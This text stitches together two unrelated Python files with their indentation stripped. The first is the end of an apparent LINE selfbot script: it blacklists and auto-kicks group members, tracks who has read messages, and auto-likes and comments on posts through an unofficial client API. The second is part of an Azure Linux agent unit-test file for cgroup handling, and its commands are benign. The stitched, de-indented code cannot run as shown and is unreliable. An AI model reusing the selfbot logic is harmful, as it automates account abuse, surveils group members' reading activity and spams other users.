targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,_name + " Succes Add to Blacklist")
except:
cl.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,_name + " Delete From Blacklist")
except:
cl.sendText(msg.to,_name + " Not In Blacklist")
elif msg.text in ["Clear"]:
wait["blacklist"] = {}
cl.sendText(msg.to,"Blacklist Telah Dibersihkan")
elif msg.text.lower() == 'ban:on':
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text.lower() == 'unban:on':
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Banlist")
num=1
msgs="══════════List Blacklist═════════"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName)
num=(num+1)
msgs+="\n══════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(wait["blacklist"])
cl.sendText(msg.to, msgs)
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
elif msg.text in ["Midban","Mid ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
cl.sendText(msg.to,cocoa)
elif msg.text.lower() == 'scan blacklist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==============================================#
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param2])
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.kickoutFromGroup(op.param1,[op.param3])
cl.updateGroup(G)
#==============================================================================#
#------------------------------------------------------------------------------#
#==============================================================================#
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def autolike():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print "Like"
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.60)
def likeme():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
print "Like"
except:
pass
else:
print "Status Sudah di Like"
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
test_cgroupconfigurator.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+ and Openssl 1.0+
#
from __future__ import print_function
import contextlib
import os
import random
import re
import subprocess
import tempfile
import time
import threading
from nose.plugins.attrib import attr
from azurelinuxagent.common import conf
from azurelinuxagent.common.cgroup import AGENT_NAME_TELEMETRY, MetricsCounter, MetricValue, MetricsCategory, CpuCgroup
from azurelinuxagent.common.cgroupconfigurator import CGroupConfigurator, _AGENT_THROTTLED_TIME_THRESHOLD, \
DisableCgroups
from azurelinuxagent.common.cgroupstelemetry import CGroupsTelemetry
from azurelinuxagent.common.event import WALAEventOperation
from azurelinuxagent.common.exception import CGroupsException, ExtensionError, ExtensionErrorCodes
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.utils import shellutil, fileutil
from tests.common.mock_environment import MockCommand
from tests.common.mock_cgroup_environment import mock_cgroup_environment, UnitFilePaths
from tests.tools import AgentTestCase, patch, mock_sleep, i_am_root, data_dir
from tests.utils.miscellaneous_tools import format_processes, wait_for
class CGroupConfiguratorSystemdTestCase(AgentTestCase):
@classmethod
def tearDownClass(cls):
CGroupConfigurator._instance = None
AgentTestCase.tearDownClass()
@contextlib.contextmanager
def _get_cgroup_configurator(self, initialize=True, enable=True, mock_commands=None):
CGroupConfigurator._instance = None
configurator = CGroupConfigurator.get_instance()
CGroupsTelemetry.reset()
with mock_cgroup_environment(self.tmp_dir) as mock_environment:
if mock_commands is not None:
for command in mock_commands:
mock_environment.add_command(command)
configurator.mocks = mock_environment
if initialize:
if not enable:
with patch.object(configurator, "enable"):
configurator.initialize()
else:
configurator.initialize()
yield configurator
def test_initialize_should_enable_cgroups(self):
with self._get_cgroup_configurator() as configurator:
self.assertTrue(configurator.enabled(), "cgroups were not enabled")
def test_initialize_should_start_tracking_the_agent_cgroups(self):
with self._get_cgroup_configurator() as configurator:
tracked = CGroupsTelemetry._tracked
self.assertTrue(configurator.enabled(), "Cgroups should be enabled")
self.assertTrue(any(cg for cg in tracked.values() if cg.name == AGENT_NAME_TELEMETRY and 'cpu' in cg.path),
"The Agent's CPU is not being tracked. Tracked: {0}".format(tracked))
def test_initialize_should_start_tracking_other_controllers_when_one_is_not_present(self):
command_mocks = [MockCommand(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')]
with self._get_cgroup_configurator(mock_commands=command_mocks) as configurator:
tracked = CGroupsTelemetry._tracked
self.assertTrue(configurator.enabled(), "Cgroups should be enabled")
self.assertFalse(any(cg for cg in tracked.values() if cg.name == 'walinuxagent.service' and 'memory' in cg.path),
"The Agent's memory should not be tracked. Tracked: {0}".format(tracked))
def test_initialize_should_not_enable_cgroups_when_the_cpu_and_memory_controllers_are_not_present(self):
command_mocks = [MockCommand(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')]
with self._get_cgroup_configurator(mock_commands=command_mocks) as configurator:
tracked = CGroupsTelemetry._tracked
self.assertFalse(configurator.enabled(), "Cgroups should not be enabled")
self.assertEqual(len(tracked), 0, "No cgroups should be tracked. Tracked: {0}".format(tracked))
def test_initialize_should_not_enable_cgroups_when_the_agent_is_not_in_the_system_slice(self):
command_mocks = [MockCommand(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')]
with self._get_cgroup_configurator(mock_commands=command_mocks) as configurator:
tracked = CGroupsTelemetry._tracked
agent_drop_in_file_cpu_quota = configurator.mocks.get_mapped_path(UnitFilePaths.cpu_quota)
self.assertFalse(configurator.enabled(), "Cgroups should not be enabled")
self.assertEqual(len(tracked), 0, "No cgroups should be tracked. Tracked: {0}".format(tracked))
self.assertFalse(os.path.exists(agent_drop_in_file_cpu_quota), "{0} should not have been created".format(agent_drop_in_file_cpu_quota))
def test_initialize_should_not_create_unit_files(self):
with self._get_cgroup_configurator() as configurator:
# get the paths to the mocked files
azure_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.azure)
extensions_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.vmextensions)
agent_drop_in_file_slice = configurator.mocks.get_mapped_path(UnitFilePaths.slice)
agent_drop_in_file_cpu_accounting = configurator.mocks.get_mapped_path(UnitFilePaths.cpu_accounting)
# The mock creates the slice unit files; delete them
os.remove(azure_slice_unit_file)
os.remove(extensions_slice_unit_file)
# The service file for the agent includes settings for the slice and cpu accounting, but not for cpu quota; initialize()
# should not create drop in files for the first 2, but it should create one the cpu quota
self.assertFalse(os.path.exists(azure_slice_unit_file), "{0} should not have been created".format(azure_slice_unit_file))
self.assertFalse(os.path.exists(extensions_slice_unit_file), "{0} should not have been created".format(extensions_slice_unit_file))
self.assertFalse(os.path.exists(agent_drop_in_file_slice), "{0} should not have been created".format(agent_drop_in_file_slice))
self.assertFalse(os.path.exists(agent_drop_in_file_cpu_accounting), "{0} should not have been created".format(agent_drop_in_file_cpu_accounting))
def test_initialize_should_create_unit_files_when_the_agent_service_file_is_not_updated(self):
with self._get_cgroup_configurator(initialize=False) as configurator:
# get the paths to the mocked files
azure_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.azure)
extensions_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.vmextensions)
agent_drop_in_file_slice = configurator.mocks.get_mapped_path(UnitFilePaths.slice)
agent_drop_in_file_cpu_accounting = configurator.mocks.get_mapped_path(UnitFilePaths.cpu_accounting)
# The mock creates the service and slice unit files; replace the former and delete the latter
configurator.mocks.add_data_file(os.path.join(data_dir, 'init', "walinuxagent.service.previous"), UnitFilePaths.walinuxagent)
os.remove(azure_slice_unit_file)
os.remove(extensions_slice_unit_file)
configurator.initialize()
# The older service file for the agent did not include settings for the slice and cpu parameters; in that case, initialize() should
# create drop in files to set those properties
self.assertTrue(os.path.exists(azure_slice_unit_file), "{0} was not created".format(azure_slice_unit_file))
self.assertTrue(os.path.exists(extensions_slice_unit_file), "{0} was not created".format(extensions_slice_unit_file))
self.assertTrue(os.path.exists(agent_drop_in_file_slice), "{0} was not created".format(agent_drop_in_file_slice))
self.assertTrue(os.path.exists(agent_drop_in_file_cpu_accounting), "{0} was not created".format(agent_drop_in_file_cpu_accounting))
def test_setup_extension_slice_should_create_unit_files(self):
with self._get_cgroup_configurator() as configurator:
# get the paths to the mocked files
extension_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.extensionslice)
configurator.setup_extension_slice(extension_name="Microsoft.CPlat.Extension")
expected_cpu_accounting = "CPUAccounting=yes"
self.assertTrue(os.path.exists(extension_slice_unit_file), "{0} was not created".format(extension_slice_unit_file))
self.assertTrue(fileutil.findre_in_file(extension_slice_unit_file, expected_cpu_accounting),
"CPUAccounting was not set correctly. Expected: {0}. Got:\n{1}".format(expected_cpu_accounting, fileutil.read_file(
extension_slice_unit_file)))
def test_remove_extension_slice_should_remove_unit_files(self):
with self._get_cgroup_configurator() as configurator:
with patch("os.path.exists") as mock_path:
mock_path.return_value = True
# get the paths to the mocked files
extension_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.extensionslice)
CGroupsTelemetry._tracked['/sys/fs/cgroup/cpu,cpuacct/azure.slice/azure-vmextensions.slice/' \
'azure-vmextensions-Microsoft.CPlat.Extension.slice'] = \
CpuCgroup('Microsoft.CPlat.Extension',
'/sys/fs/cgroup/cpu,cpuacct/azure.slice/azure-vmextensions.slice/azure-vmextensions-Microsoft.CPlat.Extension.slice')
configurator.remove_extension_slice(extension_name="Microsoft.CPlat.Extension")
tracked = CGroupsTelemetry._tracked
self.assertFalse(
any(cg for cg in tracked.values() if cg.name == 'Microsoft.CPlat.Extension' and 'cpu' in cg.path),
"The extension's CPU is being tracked")
self.assertFalse(os.path.exists(extension_slice_unit_file), "{0} should not be present".format(extension_slice_unit_file))
def test_enable_should_raise_cgroups_exception_when_cgroups_are_not_supported(self):
with self._get_cgroup_configurator(enable=False) as configurator:
with patch.object(configurator, "supported", return_value=False):
with self.assertRaises(CGroupsException) as context_manager:
configurator.enable()
self.assertIn("Attempted to enable cgroups, but they are not supported on the current platform", str(context_manager.exception))
def test_enable_should_set_agent_cpu_quota_and_track_throttled_time(self):
with self._get_cgroup_configurator(enable=False) as configurator:
agent_drop_in_file_cpu_quota = configurator.mocks.get_mapped_path(UnitFilePaths.cpu_quota)
if os.path.exists(agent_drop_in_file_cpu_quota):
raise Exception("{0} should not have been created during test setup".format(agent_drop_in_file_cpu_quota))
configurator.enable()
expected_quota = "CPUQuota={0}%".format(conf.get_agent_cpu_quota())
self.assertTrue(os.path.exists(agent_drop_in_file_cpu_quota), "{0} was not created".format(agent_drop_in_file_cpu_quota))
self.assertTrue(
fileutil.findre_in_file(agent_drop_in_file_cpu_quota, expected_quota),
"CPUQuota was not set correctly. Expected: {0}. Got:\n{1}".format(expected_quota, fileutil.read_file(agent_drop_in_file_cpu_quota)))
self.assertTrue(CGroupsTelemetry.get_track_throttled_time(), "Throttle time should be tracked")
def test_enable_should_not_track_throttled_time_when_setting_the_cpu_quota_fails(self):
with self._get_cgroup_configurator(enable=False) as configurator:
if CGroupsTelemetry.get_track_throttled_time():
raise Exception("Test setup should not start tracking Throttle Time")
configurator.mocks.add_file(UnitFilePaths.cpu_quota, Exception("A TEST EXCEPTION"))
configurator.enable()
self.assertFalse(CGroupsTelemetry.get_track_throttled_time(), "Throttle time should not be tracked")
def test_disable_should_reset_cpu_quota_and_tracked_cgroups(self):
with self._get_cgroup_configurator() as configurator:
if len(CGroupsTelemetry._tracked) == 0:
raise Exception("Test setup should have started tracking at least 1 cgroup (the agent's)")
if not CGroupsTelemetry._track_throttled_time:
raise Exception("Test setup should have started tracking Throttle Time")
configurator.disable("UNIT TEST", DisableCgroups.AGENT)
agent_drop_in_file_cpu_quota = configurator.mocks.get_mapped_path(UnitFilePaths.cpu_quota)
self.assertTrue(os.path.exists(agent_drop_in_file_cpu_quota), "{0} was not created".format(agent_drop_in_file_cpu_quota))
self.assertTrue(
fileutil.findre_in_file(agent_drop_in_file_cpu_quota, "^CPUQuota=$"),
"CPUQuota was not set correctly. Expected an empty value. Got:\n{0}".format(fileutil.read_file(agent_drop_in_file_cpu_quota)))
self.assertEqual(len(CGroupsTelemetry._tracked), 0, "No cgroups should be tracked after disable. Tracking: {0}".format(CGroupsTelemetry._tracked))
self.assertFalse(CGroupsTelemetry._track_throttled_time, "Throttle Time should not be tracked after disable")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_not_use_systemd_when_cgroups_are_not_enabled(self, _):
with self._get_cgroup_configurator() as configurator:
configurator.disable("UNIT TEST", DisableCgroups.ALL)
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as patcher:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="date",
cmd_name="test",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
command_calls = [args[0] for args, _ in patcher.call_args_list if len(args) > 0 and "date" in args[0]]
self.assertEqual(len(command_calls), 1, "The test command should have been called exactly once [{0}]".format(command_calls))
self.assertNotIn("systemd-run", command_calls[0], "The command should not have been invoked using systemd")
self.assertEqual(command_calls[0], "date", "The command line should not have been modified")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_use_systemd_run_when_cgroups_are_enabled(self, _):
with self._get_cgroup_configurator() as configurator:
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="the-test-extension-command",
cmd_name="test",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
command_calls = [args[0] for (args, _) in popen_patch.call_args_list if "the-test-extension-command" in args[0]]
self.assertEqual(len(command_calls), 1, "The test command should have been called exactly once [{0}]".format(command_calls))
self.assertIn("systemd-run", command_calls[0], "The extension should have been invoked using systemd")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_start_tracking_the_extension_cgroups(self, _):
# CPU usage is initialized when we begin tracking a CPU cgroup; since this test does not retrieve the
# CPU usage, there is no need for initialization
with self._get_cgroup_configurator() as configurator:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="test command",
cmd_name="test",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
tracked = CGroupsTelemetry._tracked
self.assertTrue(
any(cg for cg in tracked.values() if cg.name == 'Microsoft.Compute.TestExtension-1.2.3' and 'cpu' in cg.path),
"The extension's CPU is not being tracked")
def test_start_extension_command_should_raise_an_exception_when_the_command_cannot_be_started(self):
with self._get_cgroup_configurator() as configurator:
original_popen = subprocess.Popen
def mock_popen(command_arg, *args, **kwargs):
if "test command" in command_arg:
raise Exception("A TEST EXCEPTION")
return original_popen(command_arg, *args, **kwargs)
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen):
with self.assertRaises(Exception) as context_manager:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="test command",
cmd_name="test",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertIn("A TEST EXCEPTION", str(context_manager.exception))
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_disable_cgroups_and_invoke_the_command_directly_if_systemd_fails(self, _):
with self._get_cgroup_configurator() as configurator:
original_popen = subprocess.Popen
def mock_popen(command, *args, **kwargs):
if 'systemd-run' in command:
# Inject a syntax error to the call
command = command.replace('systemd-run', 'systemd-run syntax_error')
return original_popen(command, *args, **kwargs)
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as output_file:
with patch("azurelinuxagent.common.cgroupconfigurator.add_event") as mock_add_event:
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen) as popen_patch:
CGroupsTelemetry.reset()
command = "echo TEST_OUTPUT"
command_output = configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command=command,
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=output_file,
stderr=output_file)
self.assertFalse(configurator.enabled(), "Cgroups should have been disabled")
disabled_events = [kwargs for _, kwargs in mock_add_event.call_args_list if kwargs['op'] == WALAEventOperation.CGroupsDisabled]
self.assertTrue(len(disabled_events) == 1, "Exactly one CGroupsDisabled telemetry event should have been issued. Found: {0}".format(disabled_events))
self.assertIn("Failed to start Microsoft.Compute.TestExtension-1.2.3 using systemd-run",
disabled_events[0]['message'],
"The systemd-run failure was not included in the telemetry message")
self.assertEqual(False, disabled_events[0]['is_success'], "The telemetry event should indicate a failure")
extension_calls = [args[0] for (args, _) in popen_patch.call_args_list if command in args[0]]
self.assertEqual(2, len(extension_calls), "The extension should have been invoked exactly twice")
self.assertIn("systemd-run", extension_calls[0],
"The first call to the extension should have used systemd")
self.assertEqual(command, extension_calls[1],
"The second call to the extension should not have used systemd")
self.assertEqual(len(CGroupsTelemetry._tracked), 0, "No cgroups should have been created")
self.assertIn("TEST_OUTPUT\n", command_output, "The test output was not captured")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_disable_cgroups_and_invoke_the_command_directly_if_systemd_times_out(self, _):
with self._get_cgroup_configurator() as configurator:
# Systemd has its own internal timeout which is shorter than what we define for extension operation timeout.
# When systemd times out, it will write a message to stderr and exit with exit code 1.
# In that case, we will internally recognize the failure due to the non-zero exit code, not as a timeout.
configurator.mocks.add_command(MockCommand("systemd-run", return_value=1, stdout='', stderr='Failed to start transient scope unit: Connection timed out'))
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
with patch("subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
CGroupsTelemetry.reset()
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="echo 'success'",
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
self.assertFalse(configurator.enabled(), "Cgroups should have been disabled")
extension_calls = [args[0] for (args, _) in popen_patch.call_args_list if "echo 'success'" in args[0]]
self.assertEqual(2, len(extension_calls), "The extension should have been called twice. Got: {0}".format(extension_calls))
self.assertIn("systemd-run", extension_calls[0], "The first call to the extension should have used systemd")
self.assertNotIn("systemd-run", extension_calls[1], "The second call to the extension should not have used systemd")
self.assertEqual(len(CGroupsTelemetry._tracked), 0, "No cgroups should have been created")
@attr('requires_sudo')
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_not_use_fallback_option_if_extension_fails(self, *args):
self.assertTrue(i_am_root(), "Test does not run when non-root")
with self._get_cgroup_configurator() as configurator:
pass # release the mocks used to create the test CGroupConfigurator so that they do not conflict the mock Popen below
command = "ls folder_does_not_exist"
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
with self.assertRaises(ExtensionError) as context_manager:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command=command,
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
extension_calls = [args[0] for (args, _) in popen_patch.call_args_list if command in args[0]]
self.assertEqual(1, len(extension_calls), "The extension should have been invoked exactly once")
self.assertIn("systemd-run", extension_calls[0],
"The first call to the extension should have used systemd")
self.assertEqual(context_manager.exception.code, ExtensionErrorCodes.PluginUnknownFailure)
self.assertIn("Non-zero exit code", ustr(context_manager.exception))
# The scope name should appear in the process output since systemd-run was invoked and stderr
# wasn't truncated.
self.assertIn("Running scope as unit", ustr(context_manager.exception))
@attr('requires_sudo')
@patch('time.sleep', side_effect=lambda _: mock_sleep())
@patch("azurelinuxagent.common.utils.extensionprocessutil.TELEMETRY_MESSAGE_MAX_LEN", 5)
def test_start_extension_command_should_not_use_fallback_option_if_extension_fails_with_long_output(self, *args):
self.assertTrue(i_am_root(), "Test does not run when non-root")
with self._get_cgroup_configurator() as configurator:
pass # release the mocks used to create the test CGroupConfigurator so that they do not conflict the mock Popen below
long_output = "a"*20 # large enough to ensure both stdout and stderr are truncated
long_stdout_stderr_command = "echo {0} && echo {0} >&2 && ls folder_does_not_exist".format(long_output)
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
with self.assertRaises(ExtensionError) as context_manager:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command=long_stdout_stderr_command,
cmd_name="test",
timeout=300,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
extension_calls = [args[0] for (args, _) in popen_patch.call_args_list if long_stdout_stderr_command in args[0]]
